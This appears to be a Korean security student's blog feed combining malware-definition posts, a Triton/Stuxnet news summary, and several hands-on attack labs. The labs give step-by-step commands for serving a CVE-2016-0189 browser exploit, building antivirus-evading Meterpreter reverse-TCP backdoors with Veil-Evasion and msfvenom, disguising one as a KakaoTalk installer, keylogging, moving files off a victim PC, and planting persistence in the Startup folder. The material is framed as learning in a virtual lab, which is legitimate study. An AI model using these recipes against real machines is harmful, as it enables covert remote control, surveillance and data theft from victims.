반응형


안녕들 하시죠 !


이번시간에는 바이러스와 웜의 차이점에 대해 알아보겠습니다.



위에 있는 아이콘은 바이러스입니다.


바이러스, 웜, 악성코드, 악성 프로그램 등등 헷갈리는 단어가 많아 알아보게됬습니다.

요새는 바이러스라는 말을 듣기가 어려운거 같습니다.


어렸을때 학교 선생님께서 20xx년 x월 x일에 컴퓨터를 키면 바이러스에 걸리니까 다들 조심해라 라는 말을 하셨던게 기억이나네요.


우선 악성코드바이러스에 대해 알아보겠습니다.

이 둘의 공통점은 공격자가 의도하는 특정 목적을 달성하기 위해 악의적인 행위를 하는 프로그램 입니다.

그러니 악성코드보다는 악성 프로그램이 더 맞는말이겠죠?


악성 프로그램의 범주에는 여러가지가 존재하는데 바이러스 또한 여기에 속합니다.

행위나 동작 방식에 따라 분류해 보겠습니다.



바이러스  


ㆍ 바이러스는 다른 대상(정상파일)을 감염시키는 형태로 실행된다.

      ㆍ 감염시킬 대상이 존재하지 않을 때에는 실행되지 않으며 다른정상파일로의 자기 복제 기능이 있다.

ㆍ 네트워크를 통해 전파되지 않으며 방식 및 위치에 따라 여러형태로 나뉜다.



ㆍ 감염시킬 대상이 존재하지 않아도, 스스로 실행될 수 있다.

ㆍ 자가 복제 및 네트워크를 통한 전파도 가능하다.


* 바이러스와 웜은 자가복제기능의 공통점이 있지만, 바이러스는 파일을 통해 감염되고 파일을 옮겨야만 전파가 되어 PC의 시스템 및 파일을 손상시키지만 웜은 네트워크를 통해 스스로 전파되고 독립 실행이 되며 네트워크 성능을 저하시킨다.


2000년대 초반 유행했던 '님다 웜'에 관한 기사 

'님다 웜' 바이러스 주의보 http://www.etnews.com/200211040160?m=1





트로이목마


ㆍ 정상파일을 가장하거나, 정상 파일안에 삽입되어 실행된다.

ㆍ 사용자의 설치를 유도한 후, 사용자 PC에 자료를 업로드, 다운로드가 가능하다.

ㆍ 최근 발생하는 대부분의 악성코드는 트로이목마다.


백도어


ㆍ 말그대로 '뒷문'

ㆍ 항상 악의적인 목적으로 사용되지는 않지만, 해커의 경우 이미 장악한 PC의 접근을 편하게하기 위해 루트를 뚫어놓는것.


애드웨어


ㆍ 악의적인 행위를 하지는 않지만 불편함을 초래하는 광고 프로그램.


악성 봇


ㆍ 스스로 실행되지 못하고, 해커의 명령에 의해 원격에서 제어 또는 실행이 가능한 프로그램 혹은 코드.

ㆍ 주로 취약점이나 백도어 등을 이용하여 전파.

ㆍ '좀비PC'는 악성 봇에 의해 감염된 PC


익스플로잇


ㆍ 소프트웨어나 하드웨어의 버그, 보안 취약점, 프로그래밍 과정에서의 취약점 등 결함을 이용해 공격자의 의도된 동작을 수행하도록 하는 명령 또는 공격행위를 가리킨다.

ㆍ 백신프로그램이 있다 하더라도 프로그램에 관한 업데이트가 되어 있지 않으면 막을 수 없다.

ㆍ 사용하는 프로그램에 대한 지속적인 업데이트 필요.


요즘은 이러한 특징들이 결합된 악성코드들이 만들어지고 있으니 최신 이슈를 지속적으로 파악하고 대처하는게 중요할 것 같습니다.


오늘은 여기까지입니다 감사합니다 !


 

참고 EST security 「바이러스와 악성코드의 차이점」



반응형




안녕들 하시죠 !


오늘은 인터넷 익스플로러의 취약점 CVE-2016-0189 를 이용하여 Drive by download 실습을 진행해보겠습니다.


이번 실습은 IGLOO SECURITY BLOG 의 ' 스크립팅 엔진 메모리 손상 취약점 ( CVE-2016-0189 ) 분석 ' 글을 참고하며 진행했습니다.


Drive by download 란?


이미 알려진 보안 취약점을 이용하여 불특정 다수에게 악성코드를 유포하는것.

보안이 취약한 홈페이지를 변조하여 이미 알려진 보안 취약점을 공격하는 악성코드를 심어놓는다.

사용자는 어떠한 다운로드나 첨부파일을 열어본적 없지만 감염되게된다.

이를 방지하기위하여 사용하는 프로그램을 최신버전으로 유지하는 것이 중요하다.

출처 EST Security 「 Drive by download란 무엇일까요 ?    


아래는 취약점 정보와 공격 시나리오 입니다.


출처 IGLOO SECURITY BLOG  「 스크립팅 엔진 메모리 손상 취약점 ( CVE-2016-0189 ) 분석 



위의 정보를 확인하고싶은 분들은 아래의 URL로 들어가보시면 될 것 같습니다.


http://www.igloosec.co.kr/BLOG_%EC%8A%A4%ED%81%AC%EB%A6%BD%ED%8C%85%20%EC%97%94%EC%A7%84%20%EB%A9%94%EB%AA%A8%EB%A6%AC%20%EC%86%90%EC%83%81%20%EC%B7%A8%EC%95%BD%EC%A0%90(CVE-2016-0189)%20%EB%B6%84%EC%84%9D?bbsCateId=1



우선 Github에서 익스플로잇 코드를 다운받고 IE 브라우저가 CVE코드의 영향을 받는지 확인해보겠습니다.


공격자PC : Kali linux

피해자PC : Window 7


https://github.com/theori-io/cve-2016-0189 // Github 페이지 입니다.


git clone https://github.com/theori-io/cve-2016-0189 // Kali 터미널에 입력해 익스플로잇 코드를 다운받겠습니다.



git clone으로 다운받은 후에 exploit 폴더로 이동합니다.

vbscript_godmode.htmlapache2 가 있는 /var/www 폴더로 이동시켜줍니다.



leafpad로 연 후에 search -> find기능을 이용하여 cmd를 찾아보겠습니다.



위의 이미지를 보시면 vbscript_godmode.html에는 cmd를 실행시키는 익스플로잇 코드가 존재합니다.


이제 피해자 PC로 이동하여 [Kali ip]/vbscript_godmode.html 을 입력해 줍니다.



실행이 잘 되었네요.


다음시간에는 이를 이용하여 피해자가 wordpress 사이트를 방문만 해도 악성코드가 받아지도록 하는 실습을 진행해보겠습니다.


오늘은 여기까지입니다 감사합니다 ! 

반응형




안녕들 하시죠 !


이번시간에는 Veil-evasion을 이용하여 백신에 탐지되지 않는 악성코드를 만들어보겠습니다.


1. Veil-evasion을 이용해 악성코드 제작.

2. Virustotal로 악성코드 검사.

3. 카카오톡 설치파일과 악성코드를 합치고 아이콘수정.

4. 피해자PC에서 악성코드 실행 후, migrate명령어로 프로세스 숨기기.

5.  keyscan, 엑셀 파일 업,다운로드, screenshot, run vnc로 피해자PC 감시.

6. 권한상승, 윈도우 SAM파일에 저장되어있는 패스워드 dump뜨기.


이러한 순서로 진행해보겠습니다.



Veil-Evasion.py를 클릭해 실행시키겠습니다.



41개의 payload를 가지고있는 Veil-evasion이 실행됬네요.

list를 입력해 페이로드를 보겠습니다.



meterpreter는 os에 상관없이 장악한 피씨가 어떤 종류건 간에 공격자가 자주 사용하는 시스템 명령어를 예약시켜놓고있습니다.

그래서 윈도우 명령어를 몰라도 되는 장점이 있습니다.

python/meterpreter/rev_tcp 라고 되어있는 27번을 사용하겠습니다.


c/meterpreter/rev_tcp를 선택해도 되겠지만, C를 사용하면 백신에 걸려버리기때문에 python을 이용해 만들겠습니다.


use 27을 입력하겠습니다.



자, 이제 set LHOST [ 본인 kali ip ], set LPORT [ 임의의 포트 ] 를 입력하고 확인을 위해 info 들어가겠습니다.



잘 입력이 되었네요.

이제 generate를 입력하겠습니다.




위에 hongpossible은 악성코드명,

1 - Pyinstaller ( default ) 는 피해자PC에 파이썬을 깔고 악성코드를 실행시켜주겠다. 라는건데 이것때문에 잡히기도 한답니다.



* 도중에 오류로 vm을 바꿔 진행하여 ip주소가 다르게 나옵니다.


주황색 부분의 악성코드경로를 복사합니다.



Ctrl + Shift + T를 눌러 새 터미널을 띄우고,

cp /usr/share/veil-output/compiled/hongpossible.exe /root/Desktop/ 을 입력해 바탕화면 경로로 악성코드 복사.



이제 드디어 핸들러를 띄우기위해 리소스파일 경로를 복사하겠습니다.



터미널 새창에서, 

msfconsole -r /usr/share/veil-output/handlers/hongpossible_handler.rc


* 이 과정에서 아래와 같은 오류가 나면 따라해보세요.

위와 같은 오류가 뜨면, 주황색 부분을 복사하세요.

vi /opt/metasploit/apps/pro/msf3/lib/msf/core/payload/dalvik.rb
그다음 :set nu 를 입력하겠습니다.


:62 를 입력해 62번째 줄로 가겠습니다.


62번째 줄의 3600*24*365*20 에서 20을 2로 바꿔주겠습니다.

3600*24*365*2

:wq로 저장하고 빠져나가시면 됩니다.



자, 이제 핸들러가 정상적으로 켜졌습니다.


그럼이제 Virustotal로 이동해 제가만든 hongpossible.exe 악성코드에 대해 검사해보겠습니다.






국내 유명 백신 V3와 ALYac에는 탐지 되지 않고있네요 !


글이 너무 길어지는 관계로 다음시간에 카카오톡 설치파일과 악성코드를 merge하는 부분부터 이어서 진행하겠습니다. 감사합니다 !




반응형




안녕들 하시죠 !


오늘은 지난번 게시물 'Backdoor malware 만들기'를 응용하여 피해자PC가 부팅 될때마다 세션이 연결되게 해보려고 합니다.


지난 게시물 msfconsole에서 피해자PC와 세션이 이어져 있는 상태에서부터 진행하겠습니다.


msfconsole에서 피해자PC의 C:\Users\hong\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 폴더로 이동해주세요.


여기서 주의할 점은 Start Menu 폴더로 들어갈때 쌍따옴표를 붙여줘야합니다. ( cd "Start Menu" )

폴더로 이동하신 후에 만든 악성파일을 upload 시키겠습니다.





이제 앞에서 줄줄이 작성했던 페이로드를 조금더 편한 리소스 파일로 만들겠습니다. ( 사실 처음부터 이렇게 할걸 그랬습니다... )

exit 명령어를 입력하시고 다시 kali linux root계정으로 나옵니다.

다음, vi hongpossible.rc 를 입력 하신 후에 i를 눌러 편집모드로 들어가주시구요.


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j


를 작성 후 esc -> :wq 로 저장하고 빠져나옵니다.


그리고 난뒤에 msfconsole -q -r hongpossible.rc 로 리소스 파일을 실행 시켜주시면 피해자PC 세션에 연결되기를 기다리는 상태가됩니다.


피해자PC를 재부팅 해보겠습니다.



왼쪽 피해자PC의 시작프로그램에 보면 hongpossible.exe가 들어가 있고 재부팅하여 로그인을 하자마자 세션에 연결이 되는것을 볼수있습니다.


오늘은 여기까지 입니다 감사합니다 !





참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity

반응형




안녕들 하시죠 !


오늘은 Metasploit을 이용해 Backdoor malware를 만들어보겠습니다.


msfvenom이라는 도구를 사용할거구요.

구성 환경은 VMware를 이용해 Kali linux ( 공격자PC ),  Window7 ( 피해자PC )를 사용했습니다. 


아래에는 msfvenom의 옵션입니다.


p : 적용할 페이로드를 선택한다.

lhost : 상대 목표 시스템에서 접속할 공격자의 IP 주소를 입력한다.

lport : 공격자의 로컬 포트넘버.

f : 파일 타입

x : 셸 코드를 넣을 템플릿 파일( 악성 코드를 넣을 원본 파일 ) 을 지정한다.

k : 원본 파일의 원래 기능을 유지하도록 한다.

e : 백신이나 IDS 탐지를 피할 인코더를 선택한다. 선택한 인코더의 적용 횟수를 -i로 지정한다.

o : 최종으로 만들어질 파일의 경로와 파일명을 지정한다.


우선 터미널에 아래의 페이로드를 만들어 파일을 생성합니다.


msfvenom -p windows/meterpreter/reverse_tcp lhost=본인 kali linux IP lport=임의로 지정 -f exe > /root/Desktop/hongpossible.exe ( 악성 코드가 저장될 위치 )



자, 보시면 바탕화면에 hongpossible.exe 라는 악성파일이 생성되었습니다.


VirusTotal 홈페이지에 제가 만든 hongpossible.exe 악성파일를 올려 검증을 받아보겠습니다.

VirusTotal URL입니다.

https://www.virustotal.com/ko/



거의 대부분의 백신에서 악성파일을 탐지하고있네요.

다음번엔 백신을 우회할 수 있는 방법도 알아봐야겠습니다.



이제 host pc ( 저는 window 10 입니다 )에서 windows defender를 끄겠습니다.

검색 -> windows defender 설정 -> windows defender 보안센터 열기 -> 바이러스 및 보안방지 -> 바이러스 및 보안방지 설정 -> 실시간 보호 끄기



다시 kali linux로 돌아와 터미널에서 msfconsole을 입력해 들어가 주시구요, 핸들러를 사용하겠습니다.


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j


이제 Window7 ( 피해자 ) PC에서 hongpossible.exe를 더블클릭해 실행해주시면 세션이 오픈됩니다.

그다음 sessions 를 입력하면 활성화 된 세션을 볼수있습니다.



sessions -i [ ID ] 를 입력 하시면 연결이 됩니다.


sessions -i 1




이제 간단한 명령어를 통해 3가지 실습을 해보려고 하는데요.


첫번째는 키 스니핑 입니다.

keyscan_start로 시작을하고, key_stop으로 서비스를 실행하고 멈출 수 있습니다.

키 입력 내용은 keyscan_dump로 확인 가능합니다.


kali linux에서 keyscan_start를 입력해 주시구요.

피해자 PC에서 메모장을 켜고 Hello World !를 입력해봤습니다.



위의 이미지를 보시면 피해자 PC에서 입력한 내용을 그대로 훔쳐볼 수 있습니다.


두번째는 방금 피해자PC 에서 입력한 메모장을 Hello라는 폴더에 넣겠습니다.

그리고, download Hello /root/Desktop 명령을 통해 Hello폴더 안에 있는 파일을 kali linux 의 /root/Desktop 경로로 가져오는 명령을 해보겠습니다.



세번째는 upload입니다.

앞에서 hongpossible.exe 를 만든 방법과 동일하게 hello.exe 라는 악성파일을 만들었습니다.

그리고 나서 upload Desktop/hello.exe 명령을 통해 kali linux의 바탕화면에 있는 hello.exe 악성파일을 업로드 시켜보겠습니다.



성공했습니다. 네번째 방법은 다음 게시물에서 진행하겠습니다.


아직 metasploit에 익숙치 못해 하루종일 삽질을 한것 같네요... 하지만 배운것도 많은 하루였습니다.


오늘은 여기까지 입니다 감사합니다 !




참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity

반응형




안녕들 하시죠 !


오늘은 기사를 읽다가 관심이 생기는 부분이 생겨 이렇게 포스팅 해보려고 합니다. 


러시아의 중앙화학역연구기관( CHIIHM ) 주도한 것으로 추측되는 "사우디 화학 공장 안전시스템을 공격한 트리톤 멀웨어"라는 주제였습니다.


멀웨어 ( Malware ) 란?


사용자의 PC, 테블릿, 모바일 폰 등의 디바이스를 감염시키는 악성코드입니다.

대부분 멀웨어의 목적은 경제적 이득이며, 보안 시스템을 우회하고 탐지를 피하도록 설계되어 있습니다.

트로이목마, 루트킷, 스파이웨어, 웜, 키로거, 랜섬웨어 등 우리가 자주 들어왔던 것들입니다.


저 또한 Metasploit 을 이용해 Malware 를 만들어봤는데 아주 간단하게 금방 만들 수 있었습니다.


배포방식은 매우 다양하며 피싱 이메일을 통해 악성파일 첨부, 악성 URL 링크, 반자동 다운로드, 포트가 열려 취약해진 PC에 네트워크로 직접 

투, 운영체제 또는 어플리케이션의 취약점을 통한 침투 등 방법도 정말 많습니다.

아래 설명할 맞춤형 Malware들은 안티멀웨어나 백신 기술을 무력화 시키기때문에 탐지가 어렵다고합니다.

 

이러한 Malware 공격을 예방하기위한 방법으로는,


ㆍ 직원들에게 이메일 및 사회공학적 기법에 대한 지속적인 교육과 실제로 훈련.

ㆍ 지속적인 업데이트 패치를 적용. ( 실제 회사에서는 패치적용을 하고싶어도 호환성과 예기치 못한 문제발생 때문에 적용하기 어렵다고합니다 )

ㆍ 멀웨어의 침입을 모니터링 하기는 힘들지만 수상한 행위를 시작한 멀웨어를 탐지하기위한 꾸준한 모니터링.

ㆍ 지속적인 데이터 백업이 있다고 하지만 완전한 방어란 없기때문에 경각심을 가지고 있어야할 것 같습니다.



트리톤은 산업 통제 시스템( ICS )만을 겨냥해 만들어진 멀웨어라고 합니다.

또한 현재까지 세상에 드러난 ICS 전용 멀웨어는 트리톤( Triton ), 스턱스넷( Stuxnet ), 인더스트로이어( Industroyer ) 이 세가지 뿐이라고 합니다.


스턱스넷은 2010년 6월경 발견된 웜 바이러스라고 합니다.

바이러스 코드 내에 " Sutxnet " 이라는 단어가 자주 등장하는 특징 때문에 " 스턱스넷 " 이라고 명명 되었다고합니다.

윈도우를 통해 감염되고, '지멘스 산업'의 소프트웨어 장비를 공격한다고 합니다.

실제로 산업시설을 감시하고 파괴한 악성 소프트웨어로서는 최초( 2010년 이란 부셰르 원전 ( 핵시설 )공격 )라고합니다.

스턱스넷은 '제로데이 취약점' 을 이용한 공격이기 때문에 패치도없고, 방어도 불가능하다고 합니다.

전문가들이 리버스 엔지니어링을 통해 6개월가량 분석할 정도로 복잡한 코드였다고합니다.

스턱스넷의 내부를 살펴본 사람들은 그 안에 구하기 힘들고 값도 비싼 제로데이 취약점이 4개나 들어있었다고합니다.

보통 제작자는 악성코드 1개에 제로데이 취약점 1개를 넣어 돈을버는데 이번은 달랐다고합니다.

전문가들은 이렇게 천문학적인 금액이 들고 조직적인 행위의 배후에는 이스라엘과 미국이 있다고 합니다.



지멘스사는 스턱스넷을 감지하고 제거하는 소프트웨어를 배포했고 제 3자에게서 받은 USB 플래시 드라이브를 사용하지 말고, 

마이크로소프트에서 제공한 취약점 패치를 설치하며, 스턱스넷이 발견될 경우 고객센터에 연락할 것을 권하는 것으로 대처했습니다. 


인더스트로이어는 2016년 우크라이나의 전력망을 공격했고, 트리톤같은 경우 발생한지 얼마 되지않은 사건이다 보니 정보가 부족하지만 

슈나이더 전자의 산업 안전 시스템에 침투하여 물리적인 피해가 발생할 정도의 조건을 발동시키도록 안전 시스템을 조작했다는 점에서 스턱스넷과 

비슷한 수법이라고 보입니다. 


이러한 사이버 공격은 보통 금전적인 목적으로 이루어진다고만 알고있었습니다.

이런 기사를 접해보니 국가와 국가간의 협력, 금전적인 지원 등등 말로만 듣던 ' 사이버 전쟁 ' 이 실감이 납니다.

많은 기사들이 공격기법과 배후에만 관심을 갖고있었고 예방하는 방법에 대해서는 관심이 많이 부족해보였습니다. 

정보보호를 공부하는 학생으로서 이러한 사건을 자주 찾아보고 예방하는 방법에 관심을 가져봐야겠다는 생각이 들었습니다.


오늘은 여기까지입니다 감사합니다 !




사우디 화학공장의 사이버공격, 러시아가 했다 ", 보안뉴스, 2018년 10월 24일 

'보안 > News' 카테고리의 다른 글

페이스북 사진유출 사건  (0) 2018.12.17
'홍석천도 당했다 ! 카톡 지인사칭 피싱'  (0) 2018.12.12
윈윈소프트 개인정보 유출사건  (0) 2018.11.25

+ Recent posts